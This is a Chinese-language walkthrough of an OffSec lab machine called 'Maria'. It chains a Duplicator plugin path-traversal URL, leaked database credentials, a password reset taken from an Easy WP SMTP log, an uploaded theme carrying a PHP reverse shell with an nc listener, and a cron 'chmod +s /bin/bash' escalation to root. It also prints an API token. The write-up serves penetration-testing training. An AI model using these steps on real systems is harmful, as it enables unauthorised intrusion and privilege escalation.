主要知识点
- 多个漏洞获得线索综合在一起分析
具体步骤
执行nmap扫描,发现ftp可以匿名登录,80端口开放了wordpress,而3306端口开放了mysql/maria
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:21 UTC
Nmap scan report for #remote_ip#
Host is up (0.00080s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.55
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 5 0 0 4096 Sep 21 2018 automysqlbackup
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Maria
|_http-generator: WordPress 5.7.1
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 283
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, Speaks41ProtocolOld, Speaks41ProtocolNew, LongColumnFlag, FoundRows, Support41Auth, IgnoreSigpipes, SupportsLoadDataLocal, SupportsTransactions, ODBCClient, SupportsCompression, IgnoreSpaceBeforeParenthesis, InteractiveClient, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: N5\OXLTA'@K7rYG8~8;]
|_ Auth Plugin Name: mysql_native_password
首先尝试匿名登录ftp,发现在cron.daily,default,sbin下面都有automysqlbackup文件,但没有权限访问或者下载,暂时搁置
利用wpscan来扫描,发现多个漏洞,不过CVE-2020-17138可以利用一下读取一些文件
C:\home\kali\Documents\OFFSEC\GoToWork\Maria> wpscan --url http://192.168.147.167 --api-token XZsKtip2dGWYxKgh0KZxVhbTC65XIvYT86wZiu9COWs --proxy socks5://127.0.0.1:7890 -e --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.147.167/ [192.168.147.167]
[+] Started: Thu Sep 26 06:15:38 2024
......
......
| [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
| Fixed in: 5.7.11
| References:
| - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
......
......
[+] duplicator
| Location: http://192.168.147.167/wp-content/plugins/duplicator/
| Last Updated: 2024-09-24T19:42:00.000Z
| Readme: http://192.168.147.167/wp-content/plugins/duplicator/readme.txt
| [!] The version is out of date, the latest version is 1.5.11
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.147.167/wp-content/plugins/duplicator/, status: 200
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download
| Fixed in: 1.3.28
| References:
| - https://wpscan.com/vulnerability/35227c3a-e893-4c68-8cb6-ffe79115fb6d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11738
| - https://www.exploit-db.com/exploits/49288/
| - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
| - https://snapcreek.com/duplicator/docs/changelog/?lite
| - https://snapcreek.com/duplicator/docs/changelog/
| - https://cxsecurity.com/issue/WLB-2021010001
......
......
[+] easy-wp-smtp
| Location: http://192.168.147.167/wp-content/plugins/easy-wp-smtp/
| Last Updated: 2024-09-26T08:21:00.000Z
| Readme: http://192.168.147.167/wp-content/plugins/easy-wp-smtp/readme.txt
| [!] The version is out of date, the latest version is 2.6.0
|
| Version: 1.4.1 (100% confidence)
搜索一圈关于duplicator插件的漏洞,可以在浏览器中访问如下link下载文件,可以尝试下载wp-config.php,尝试其中的db用户名密码配置,无效
http://#remote_ip#/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
百度或google vsftpd配置文件目录,发现位置在/etc/vsftpd/vsftpd.conf,下载后得知 ftp在服务器上的根路径为 /srv/ftp
listen=YES
listen_ipv6=NO
anonymous_enable=YES
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
pasv_enable=YES
pasv_max_port=10100
pasv_min_port=10090
download_enable=NO
anon_root=/srv/ftp
将anon_root路径与ftp服务器中的路径拼接,会得到完整路径,利用wordpress漏洞下载后重命名,方便区分,阅读后,发现sbin目录下的automysqlbackup比较有价值
/srv/ftp/automysqlbackup/etc/cron.daily/automysqlbackup
/srv/ftp/automysqlbackup/etc/default/automysqlbackup
/srv/ftp/automysqlbackup/usr/sbin/automysqlbackup
在其中发现了 /etc/default/automysqlbackup文件,尝试下载并重命名为 etc.default.automysqlbackup
#=====================================================================
#=====================================================================
# Set the following variables to your system needs
# (Detailed instructions below variables)
#=====================================================================
if [ -f /etc/default/automysqlbackup ] ; then
. /etc/default/automysqlbackup
else
# Username to access the MySQL server e.g. dbuser
USERNAME=dbuser (假的,不好用)
# Username to access the MySQL server e.g. password
PASSWORD=password (假的,不好用)
......
......
# Command to run before backups (uncomment to use)
#PREBACKUP="/etc/mysql-backup-pre"
# Command run after backups (uncomment to use)
POSTBACKUP=/var/www/html/wordpress/backup_scripts/backup-post (后期会用到)
终于在其中发现了真的数据库用户名密码,下一步打算是破解mysql中的workdpress admin密码和wordpress的admin+file upload来构造reverse shell,但是事情好像没那么简单,获取的ID没有更新数据库的权限,无法通过更新密码来登录,john 破解也没有什么希望,看来需要继续探索其他方式.
# By default, the Debian version of automysqlbackup will use:
# mysqldump --defaults-file=/etc/mysql/debian.cnf
# but you might want to overwrite with a specific user & pass.
# To do this, simply edit bellow.
# Username to access the MySQL server e.g. dbuser
USERNAME=backup
# Username to access the MySQL server e.g. password
PASSWORD=EverydayAndEverynight420
# Host name (or IP address) of MySQL server e.g localhost
DBHOST=localhost
借助另外一个wordpress插件 easy-wp-smtp,搜索后,发现两个 vulnerability:
- GitHub - KTN1990/WordPress-Easy-WP-SMTP-plugin-0day: easy-wp-smtp的debug日志可以在/wp-content/plugins/easy-wp-smtp/被访问到,虽然目前咱们在这个路径下看不到文件
- Critical Vulnerability in Easy WP SMTP WordPress Plugin - Patchstack: reset password的link会输出到easy-wp-smtp的日志文件中
先尝试reset password,admin的邮件地址可以在wp_users表中找到joseph@maria.pg
经过搜索easy-wp-smtp的信息,发现他的配置在表wp_option 中,option_name为swpsmtp_options的记录中,得到 log文件名: 66f6633142bce_debug_log.txt,拼接到第一个vulnerability的路径中得到reset password link
修改密码并登录成功
经过试验,无法修改已经存在的theme的文件,但是我们可以上传一个,去Free WordPress Themes — WordPress.com里下载一个theme,我偏好带有index.php的theme,这里我选择了Hey这个,下载到本地以后解压缩,复制 /usr/share/webshells/php/php-reverse-shell.php 到theme目录下修改ip和port并replace index.php,再压缩成zip
C:\home\kali\Documents\OFFSEC\GoToWork\Maria> zip -r hey-wpcom-1.0.8.zip hey-wpcom
上传theme并激活
在本地执行nc -nlvp 80后,访问http://#remote_ip#会得到reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Maria> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.152.167] 60494
Linux maria 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
04:51:17 up 1:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ bash
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
上传并执行pspy64,发现automysqlbackup会在很短的时间内被执行,应该是cronjob
2024/09/27 05:56:01 CMD: UID=0 PID=25567 | /bin/sh -c /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25568 | /bin/bash /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25569 | /bin/bash /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25570 | /bin/bash /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25571 | /bin/bash /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25572 | /bin/bash /usr/sbin/automysqlbackup
2024/09/27 05:56:01 CMD: UID=0 PID=25573 | /bin/bash /usr/sbin/automysqlbackup
看了一下和automysqlbackup相关的文件,都无法修改,但是注意到了
/var/www/html/wordpress/backup_scripts/backup-post,应该是在执行备份后执行,但并没有该文件,所以可以考虑创建一个试试,发现root权限被获取
www-data@maria:/var/www/html/wordpress/backup_scripts$
www-data@maria:/var/www/html/wordpress/backup_scripts$ echo "chmod +s /bin/bash" > backup-post
<up_scripts$ echo "chmod +s /bin/bash" > backup-post
www-data@maria:/var/www/html/wordpress/backup_scripts$ cat backup-post
cat backup-post
chmod +s /bin/bash
www-data@maria:/var/www/html/wordpress/backup_scripts$
www-data@maria:/var/www/html/wordpress/backup_scripts$ chmod +x backup-post
chmod +x backup-post
www-data@maria:/var/www/html/wordpress/backup_scripts$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
www-data@maria:/var/www/html/wordpress/backup_scripts$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
1bf86c557d532d1201f76c45b639b202
bash-5.0#